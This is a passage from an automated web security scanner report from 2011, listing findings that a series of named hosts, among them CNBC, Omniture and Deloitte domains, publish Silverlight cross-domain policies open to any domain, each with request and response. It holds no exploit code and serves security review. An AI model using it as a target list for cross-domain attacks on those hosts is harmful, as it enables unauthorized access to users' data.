5.6. http://oimg.m.cnbc.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.m.cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:48 GMT
Server: Omniture DC/2.0.0
xserver: www369
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://oimg.nbcuni.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.nbcuni.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
xserver: www339
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.8. http://omni.csc.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.csc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www366
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.9. http://oracle.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracle.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:05 GMT
Server: Omniture DC/2.0.0
xserver: www635
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.10. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:27 GMT
Server: Omniture DC/2.0.0
xserver: www166
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.11. http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
xserver: www393
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.12. http://pixel.quantserve.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 312
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

5.13. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 00:34:25 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 51825
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Tue, 13 Sep 2011 14:56:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.15. http://speed.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.16. http://stats.deloitte.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.deloitte.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:02 GMT
Server: Omniture DC/2.0.0
xserver: www384
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.17. http://wingateweb.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wingateweb.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:53 GMT
Server: Omniture DC/2.0.0
xserver: www93
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.18. http://cnbc.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
ETag: "0a59338016cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:43 GMT
Connection: close
Content-Length: 1330

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.19. http://cvs.shoplocal.com/clientaccesspolicy.xml  previous  next